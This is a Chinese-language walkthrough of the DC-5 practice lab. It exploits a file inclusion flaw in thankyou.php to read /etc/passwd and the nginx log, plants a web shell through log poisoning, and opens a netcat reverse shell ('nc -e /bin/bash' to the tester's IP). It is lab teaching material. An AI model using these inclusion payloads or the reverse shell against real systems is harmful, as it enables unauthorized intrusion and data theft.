DC-5渗透测试教程详解(上)

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介: DC-5渗透测试教程详解

DC-5渗透测试教程详解


测试机和靶机准备

有需要自取,注意调整DC-5的与kali在同一个为NAT模式下


[测试机kali]

b2ca9dd019824770bb645f79f5d0c43d.jpg


[靶机DC-5]

e0531f86231b48a3a0097d1d1bc998c2.jpg



信息收集

kali的IP地址为 192.168.10.140

- kali

cb39e35ddf0b4a8084819e7705ea570a.png

- dc-5

d640e2fae0c4429a9c182c1edebf4b5f.png

使用nmap进行扫描

2e0761c6f0e64986ba25b8c861d20d30.png


打开浏览器登录 192.168.10.134进行访问,确定其是否为目标主机

df9597f2d277466e8c659e46a1cf4409.png


漏洞分析

寻找漏洞

e8404ec2963f447faf1dca7655ba90c2.png


在contact界面提交信息后,发现底部的时间显示会变动,

所以猜测可能存在漏洞。底部的年份显示独立存在的数据,

可能存在于某个文件中,传递给了thankyou.php。

验证猜想,使用御剑对其扫描

发现有可以文件 footer.php

9cf6bc402d13476c8fa1514501f7c006.png


对其进行访问,kali火狐,输入链接:192.168.10.136/footer.php,该文件内容恰好】是底部的年份信息


2284bacd60774bff89b8fe3e6e43402f.png


猜想是否行访问,kali火狐,输入链接:192.168.10.136/footer.php,该文件内容恰好是底部的年份

有可能是通过链接传入的!


验证猜想,构造连接

验证想法,构造链接,访问对比,192.168.10.136/thankyou.php?file=footer.php

a9715f0f97cc43f3a2ecc8ac7641ff38.png


192.168.10.139/thankyou.php?file=

41b15791dbee4e5981c1b3e3420c502b.png


如果参数值换成/etc/passwd,那么在底部就会显示DC5的用户信息

d3ac3d3cb2a74a499d4cee7628a48868.png


如果参数值换成nginx日志文件的目录/var/log/nginx/error.log,那么在底部就会显示nginx的日志文件信息。

0b0b27d931a9432ca1d0149712a6ba21.png


渗透测试

文件包含漏洞:通过日志挂马的方式,想办法将一句话木马写入到靶机的日志文件中

62cba8eedd174d0486e34a9686eb644c.png


上传分析

e2789963eb7b4f3bb93f6dc0618a8bb7.png


使用Burp suite抓包,上传


29a535bc394d4d6aa40bb4c86cdcdabe.png

d446c66a3f04468b8779df8c99acd629.png


验证 http://192.168.10.134/thankyou.php?file=/var/log/nginx/error.log ,查看日志是否上传成功

925026f3b9364e1781533151263dbf1c.png

使用蚁剑连接

686e29db4a424bb29d6763f8699c3752.png


测试连接

4d1466c4bc4d4e81a19d52fb8b889aec.png

74aaeb20b2104f1fb1e454a415d19c1d.png

输入命令 ——发现没有权限

c562d2b03d024db6bdce738d53b7ef81.png

建立反向连接

kali建立反向连接

在kali上开启监听,终端输入命令nc –lvvp 1234

蚁剑中执行命令 nc -e /bin/bash 192.168.10.140 1234 。

在蚁剑中执行的命令不要复制,要手动输入。 192.168.10.140是kali的地址。

2e73dbfcd8cc4aa4a6a5e2f4af3dbac6.png

相关文章
|
2天前
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
9 1
|
25天前
|
自然语言处理 机器人 Python
ChatGPT使用学习:ChatPaper安装到测试详细教程(一文包会)
ChatPaper是一个基于文本生成技术的智能研究论文工具,能够根据用户输入进行智能回复和互动。它支持快速下载、阅读论文,并通过分析论文的关键信息帮助用户判断是否需要深入了解。用户可以通过命令行或网页界面操作,进行论文搜索、下载、总结等。
39 1
ChatGPT使用学习:ChatPaper安装到测试详细教程(一文包会)
|
27天前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
29 4
|
27天前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
31 4
|
1月前
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
【10月更文挑战第1天】告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
55 4
|
3月前
|
存储 Ubuntu 安全
ROS2教程02 ROS2的安装、配置和测试
本文是关于ROS2(机器人操作系统2)的安装、配置和测试的教程。内容包括使用一键安装脚本快速安装ROS2 Humble版,手动安装步骤,设置语言环境、添加软件源、更新软件包、安装ROS2桌面版和开发工具,配置ROS2环境,创建工作空间,配置ROS2领域以避免网络冲突,以及如何删除ROS2。此外,还包括了测试ROS2是否安装成功的两个案例:基本的Topic通信测试和使用Turtlesim演示程序。适用于Ubuntu 22.04操作系统。
235 1
ROS2教程02 ROS2的安装、配置和测试
|
2月前
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
【9月更文挑战第5天】性能测试是确保应用在高负载下稳定运行的关键。本文介绍Apache JMeter和Locust两款常用性能测试工具,帮助识别并解决性能瓶颈。JMeter适用于测试静态和动态资源,而Locust则通过Python脚本模拟HTTP请求。文章详细讲解了安装、配置及使用方法,并提供了实战案例,帮助你掌握性能测试技巧,提升应用性能。通过分析测试结果、模拟并发、检查资源使用情况及代码优化,确保应用在高并发环境下表现优异。
72 5
|
3月前
|
测试技术 开发工具 虚拟化
iOS自动化测试方案(一):MacOS虚拟机保姆级安装Xcode教程
这篇文章提供了一份保姆级的教程,指导如何在MacOS虚拟机上安装Xcode,包括环境准备、基础软件安装以及USB扩展插件的使用,以实现iOS自动化测试方案的第一步。
93 0
iOS自动化测试方案(一):MacOS虚拟机保姆级安装Xcode教程
|
2月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
34 0
|
2月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
39 0